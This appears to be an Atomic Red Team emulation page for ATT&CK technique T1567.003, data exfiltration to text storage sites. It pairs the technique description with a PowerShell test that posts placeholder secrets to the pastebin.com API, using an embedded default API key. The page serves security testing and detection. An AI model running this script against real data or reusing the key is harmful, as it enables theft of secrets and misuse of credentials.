T1567.003
Exfiltration Over Web Service: Exfiltration to Text Storage Sites
Description from ATT&CK
Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information.
Text storage sites are often used to host malicious code for C2 communication (e.g., Stage Capabilities), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)
Note: This is distinct from Exfiltration to Code Repository, which highlight access to code repositories via APIs.
Atomic Tests
Atomic Test #1 - Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)
This test uses HTTP POST to exfiltrate data to a remote text storage site. (pastebin)
See https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it
Supported Platforms: windows
auto_generated_guid: c2e8ab6e-431e-460a-a2aa-3bc6a32022e3
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| api_key | Pastebin API key | string | 6nxrBm7UIJuaEuPOkH5Z8I7SvCLN3OP0 |
Attack Commands: Run with powershell!
1
2
3
4
5
6
7
8
9
10
11
$apiKey = "#{api_key}"
$content = "secrets, api keys, passwords..."
$url = "https://pastebin.com/api/api_post.php"
$postData = @{
api_dev_key = $apiKey
api_option = "paste"
api_paste_code = $content
}
$response = Invoke-RestMethod -Uri $url -Method Post -Body $postData
Write-Host "Your paste URL: $response"